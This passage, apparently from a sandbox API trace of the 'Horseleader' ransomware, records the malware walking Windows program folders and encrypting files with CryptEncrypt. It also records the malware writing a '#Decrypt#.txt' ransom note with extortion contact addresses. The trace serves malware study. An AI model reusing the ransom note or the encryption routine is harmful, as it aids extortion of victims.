hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.889] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54e68005, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.889] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.889] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png") returned 95 [0251.889] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.889] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.889] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.889] lstrlenW (lpString=".testttjffg") returned 11 [0251.889] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.889] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.889] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.889] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7d8fa7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7d8fa7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54f98af5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.889] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.889] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png") returned 90 [0251.889] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.889] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.889] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.889] lstrlenW (lpString=".testttjffg") returned 11 [0251.889] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.890] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.890] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.890] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f78cced, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f78cced, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.890] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.890] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png") returned 96 [0251.890] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.890] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.890] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.890] lstrlenW (lpString=".testttjffg") returned 11 [0251.890] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.890] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.890] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.890] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f766b90, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f766b90, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.891] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.891] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png") returned 87 [0251.891] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.891] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.891] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.891] lstrlenW (lpString=".testttjffg") returned 11 [0251.891] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.891] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.891] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.891] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.891] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.891] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png") returned 93 [0251.891] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.891] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.891] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.891] lstrlenW (lpString=".testttjffg") returned 11 [0251.891] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.892] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.892] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.892] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="photograph.png", cAlternateFileName="")) returned 1 [0251.892] lstrcmpiW (lpString1="photograph.png", lpString2="Windows") returned -1 [0251.892] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png") returned 71 [0251.892] StrStrIW (lpFirst="photograph.png", lpSrch=".horseleader") returned 0x0 [0251.892] lstrcmpW (lpString1="photograph.png", lpString2="#Decrypt#.txt") returned 1 [0251.892] lstrcmpW (lpString1="photograph.png", lpString2="_uninstalling_.png") returned 1 [0251.892] lstrlenW (lpString=".testttjffg") returned 11 [0251.892] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png", lpSrch=".testttjffg") returned 0x0 [0251.892] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.892] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.893] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="photograph.png", cAlternateFileName="")) returned 0 [0251.893] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.894] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\#Decrypt#.txt") returned 70 [0251.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.895] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.895] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.897] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.897] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.897] CloseHandle (hObject=0x158) returned 1 [0251.897] GetProcessHeap () returned 0x780000 [0251.897] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.897] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Travel", cAlternateFileName="")) returned 1 [0251.897] lstrcmpiW (lpString1="Travel", lpString2="Windows") returned -1 [0251.897] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 54 [0251.897] lstrcmpW (lpString1="Travel", lpString2=".") returned 1 [0251.897] lstrcmpW (lpString1="Travel", lpString2="..") returned 1 [0251.897] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.897] GetProcessHeap () returned 0x780000 [0251.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.898] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*") returned 56 [0251.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.901] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.901] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\.") returned 56 [0251.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.901] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa108fe2a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8b92dd, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa11287e6, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.901] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.901] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\..") returned 57 [0251.902] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.902] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.902] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x701d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0251.902] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0251.902] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png") returned 80 [0251.902] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".horseleader") returned 0x0 [0251.902] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.902] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0251.902] lstrlenW (lpString=".testttjffg") returned 11 [0251.902] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png", lpSrch=".testttjffg") returned 0x0 [0251.902] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.902] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.902] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.903] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726438ff, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726438ff, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0251.904] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0251.904] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png") returned 79 [0251.904] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.904] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.904] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.904] lstrlenW (lpString=".testttjffg") returned 11 [0251.904] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.904] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.904] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.904] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 